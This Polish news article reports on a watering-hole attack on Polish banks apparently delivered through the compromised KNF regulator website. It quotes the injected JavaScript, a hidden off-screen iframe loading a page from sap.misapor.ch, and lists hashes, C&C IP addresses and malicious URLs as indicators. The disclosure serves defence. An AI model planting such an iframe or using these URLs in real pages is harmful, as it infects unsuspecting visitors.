Włamania do kilku banków skutkiem poważnego ataku na polski sektor finansowy

Od ponad tygodnia polski sektor bankowy walczy z bardzo skutecznymi włamywaczami. Nieznani sprawcy uzyskali jakiś czas temu dostęp do stacji roboczych oraz serwerów w co najmniej kilku bankach i wykradli z nich dane.

Wszystko wskazuje na to, że mamy do czynienia z najpoważniejszym ujawnionym atakiem na infrastrukturę krytyczną oraz sektor bankowy w historii naszego kraju. W ostatnich dniach kilka działających w Polsce banków odnalazło w swojej sieci zaawansowane technicznie złośliwe oprogramowanie, nieznane wcześniej narzędziom antywirusowym. Zainfekowane były zarówno komputery pracowników, jak i – co gorsze – serwery bankowe. Włamywacze mogli niezauważeni atakować wewnętrzne sieci banków od co najmniej kilku tygodni, a prawdopodobnie w niektórych przypadkach nawet od jesieni 2016.

Analizy trwają

W wielu bankach trwa w tej chwili skrupulatny przegląd wszystkich komputerów, serwerów oraz rejestrów ruchu sieciowego. Niektóre badanie zakończyły i potwierdziły, że nie były ofiarami ataków. Inne nadal szukają, zatem nie jest wykluczone, że liczba potwierdzonych infekcji może wzrosnąć. Kilka dni temu w wewnętrznym systemie międzybankowym SWOZ (System Wymiany Ostrzeżeń o Zagrożeniach) zamieszczone zostały informacje o potencjalnych symptomach infekcji. Obejmują one sporą listę adresów IP, z których korzystało złośliwe oprogramowanie oraz krótki opis techniczny sposobu jego funkcjonowania. Pojawiły się także uzasadnione podejrzenia, że pierwotnym sposobem ataku było złośliwe oprogramowanie umieszczone na serwerze pewnej instytucji państwowej, które od października próbowało infekować wyłącznie komputery wybranych użytkowników, w tym pracowników banków.

Prawdopodobny związek z tą sytuacją ma tymczasowa niedostępność witryny Komisji Nadzoru Finansowego (www.knf.gov.pl), która wczoraj około południa na chwilę całkiem zniknęła z sieci, by powrócić z poniższym komunikatem.

Byłoby niezwykłą ironia losu, gdyby okazało się, że to faktycznie witryna instytucji odpowiedzialnej za wyznaczanie i egzekwowanie zasad bezpieczeństwa IT w sektorze finansowym sama stała się na skutek własnych zaniedbań narzędziem ataku na firmy, których poziom zabezpieczeń kontrolowała. Niestety na taki przebieg wydarzeń mogą wskazywać zapisy z serwisu PassiveTotal (wymagana rejestracja), który odnotował pojawienie się w domenie knf.gov.pl wstrzykniętych obiektów z podejrzanych domen takich jak eye-watch.in oraz sap.misapor.ch, które zaczęły się ok. 7 października 2016 a skończyły dopiero wczorajszym wyłączeniem strony KNF.

Nieautoryzowany kod znajdował się w pliku

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

i wyglądał tak:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor<br>.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top<br>:0px;'></iframe></div>");<br>

Kilka słów o narzędziach i samym ataku

Wiemy, że użyte przez przestępców narzędzia charakteryzują się przyzwoitym poziomem zaawansowania technicznego oraz złożoności. Ich twórcy postarali się, by utrudnić wykrycie oraz analizę ataku. Większość z odnalezionych składników złośliwego oprogramowania nadal nie jest wykrywana przez żaden program antywirusowy. Narzędzia przestępców komunikowały się z zewnętrznymi serwerami zlokalizowanymi w egzotycznych krajach, które zapewne służyły jedynie jako jedna z wielu warstw ukrywających prawdziwą lokalizację centrum sterowania infekcją. To dzięki mechanizmom ciągłej rejestracji ruchu internetowego stosowanych przez banki były one w stanie zidentyfikować, że padły ofiarami infekcji. Niestety w większości przypadków systemy bezpieczeństwa nie pozwalają na ustalenie, jakie dokładnie były cele działania przestępców. Co znamienne, nie mamy jak do tej pory żadnych informacji o powiązanych z tymi atakami udanych lub nieudanych próbach kradzieży środków z rachunków bankowych. Może to wskazywać, że celem atakujących były informacje, a nie pieniądze. W co najmniej jednym przypadku wiadomo, że duże ilości danych zostały przesłane z sieci banku na zewnętrzne serwery, jednak ze względu na fakt, że dane były przed wysyłką przez przestępców szyfrowane, ustalenie co skradziono może być trudne.

Czy moje pieniądze są bezpieczne?

Według informacji, którymi dysponujemy, jak do tej pory nic nie wskazuje na to, by celem przestępców były środki zgromadzone na rachunkach klientów banków. Można zatem przyjąć, że z punktu widzenia tego ataku Wasze pieniądze są w bankach bezpieczne.

Kto za tym stoi?

Skala ataku, sposób jego przeprowadzenia i poziom zaawansowanie użytych narzędzi sugerują działanie albo wyspecjalizowanej grupy przestępczej, albo wywiadu obcego państwa. Ślady zawarte zarówno w oprogramowaniu jak i wynikające z analizy ruchu sieciowego wskazują na różne kraje, zatem nie sposób na ich podstawie próbować przypisywać jakiejkolwiek odpowiedzialności. Bez wątpienia na świecie jest kilka lub kilkanaście grup włamywaczy potrafiących przeprowadzać podobne ataki – pytanie, która z nich i z jakiego powodu była zainteresowana danymi z polskiego systemu bankowego.

Pracuję w banku, co robić?

Incydent pokazał dwa problemy. Po pierwsze udowadnia, że do każdego można się włamać. Pokazuje też, że wykrycie takiego włamania, nawet w firmach względnie dojrzałych pod kątem bezpieczeństwa IT, jakimi są polskie banki, zajmuje sporo czasu. Na plus bankom możemy zaliczyć to, że jak mało które firmy są dzisiaj w stanie sprawdzić, czy padły ofiarami włamania i włamywacza z sieci usunąć. Niestety incydent pokazał także, że dużym problemem sektora finansowego (choć w innych nie jest lepiej) jest brak wymiany informacji pomiędzy poszczególnymi podmiotami. Banki, które atak wykryły jako pierwsze, niekoniecznie chciały bezpośrednio dzielić się taką informacją z konkurencją. Te, które infekcji nie znalazły, zastanawiają się, co robić i na czyją pomoc mogą liczyć. Brak sensownej koordynacji ze strony organów do tego powołanych niestety nie ułatwia sprawy. Najwyraźniej nie dorosły jeszcze do ról, które w założeniu miały w takich sytuacjach odgrywać. Na całe szczęście niektóre banki szybko udostępniły dane ze swoich analiz pozostałym graczom w sektorze. Jeśli zatem możecie i chcecie poszukać w swoim banku śladów zagrożenia, to spójrzcie na komunikaty w systemie SWOZ i przeanalizujcie swoje logi (bo macie logi, prawda?). Jeśli szukacie pomocy merytorycznej, możecie spróbować w zespołach takich jak CERT.PL i CERT.GOV.PL. Operatorom infrastruktury krytycznej przypominamy o art. 32d Ustawy o ABW oraz AW zobowiązującym ich do zgłoszenia incydentu do CERT.GOV.PL.

Jeśli zaś o podobnych incydentach chcecie wiedzieć zanim pojawi się komunikat na SWOZ lub artykuł na z3s, to napiszcie do nas emaila (ze służbowego adresu) a najlepiej podejdźcie na którejś z tegorocznych konferencji by poznać się osobiście – przedstawimy kolegom z innych banków i współpraca międzybankowa będzie prostsza i efektywniejsza.

Jeśli z kolei nie pracujecie w banku i nie macie dostępu do SWOZ, to poniższe informacje powinny pomóc Wam zorientować się, czy jesteście ofiarami infekcji.

Hashe części plików użytych w procesie infekcji (kolejno MD5, SHA1, SHA256):

C1364BBF63B3617B25B58209E4529D8C 85D316590EDFB4212049C4490DB08C4B 1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE 496207DB444203A6A9C02A32AFF28D563999736C 4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2 BEDCEAFA2109139C793CB158CEC9FA48F980FF2B FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2 CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A

Niektóre adresy IP serwerów C&C, z którymi komunikowało się złośliwe oprogramowanie:

125.214.195.17 196.29.166.218

Potencjalnie złośliwe adresy serwowane z witryny knf.gov.pl:

http://sap.misapor.ch/vishop/view.jsp?pagenum=1 https://www.eye-watch.in/design/fancybox/Pnf.action

Mamy nadzieję, że wynikiem tego incydentu będzie istotne i faktyczne (a nie tylko spełniające wymogi regulacyjne) podniesienie poziomu bezpieczeństwa w polskich bankach. Ryzyko, że to bank sam padnie ofiara ataku, nie jest już iluzoryczne i nie dotyczy tylko mniejszych podmiotów. To chyba dobry moment na poważne potraktowanie zagrożeń, posłuchanie głosów bezpieczników i przeznaczenie na ten cel adekwatnych środków i zasobów (i nie chodzi tu o kupienie większej liczby „pudełek”, bo tych w zaatakowanych bankach nie brakowało).

Aktualizacja 2017-02-03 11:00

W serwisie cashless.pl można znaleźć komentarz KNFu o treści:

UKNF W Urzędzie Komisji Nadzoru Finansowego zidentyfikowana została próba ingerencji z zewnątrz w system informatyczny obsługujący stronę internetową www.knf.gov.pl. Wewnętrzne systemy raportowania przez podmioty nadzorowane funkcjonują niezależnie od systemu informatycznego obsługującego stronę internetową i pozostają bezpieczne. Prace Urzędu przebiegają w sposób niezakłócony. W sprawie tej zostało złożone zawiadomienie do właściwych organów ścigania, z którymi Urząd ściśle współpracuje. Strona internetowa www.knf.gov.pl została wyłączona przez administratorów zw celu zabezpieczenia materiału dowodowego. Urząd pozostaje w bieżącym kontakcie z przedstawicielami nadzorowanych sektorów, w tym bankowego, których działalność nie jest w żadnym stopniu zagrożona.

Bardzo lubimy, jak „włamano się na naszą stronę w październiku, zmieniono jej zawartość i zareagowaliśmy w lutym po tym jak ktoś nas porządnie szturchnął” ujmują słowa „zidentyfikowana została próba ingerencji z zewnątrz w system informatyczny obsługujący stronę internetową”. Niestety na naszą wczorajszą prośbę o komentarz KNF nie raczył jeszcze odpowiedzieć.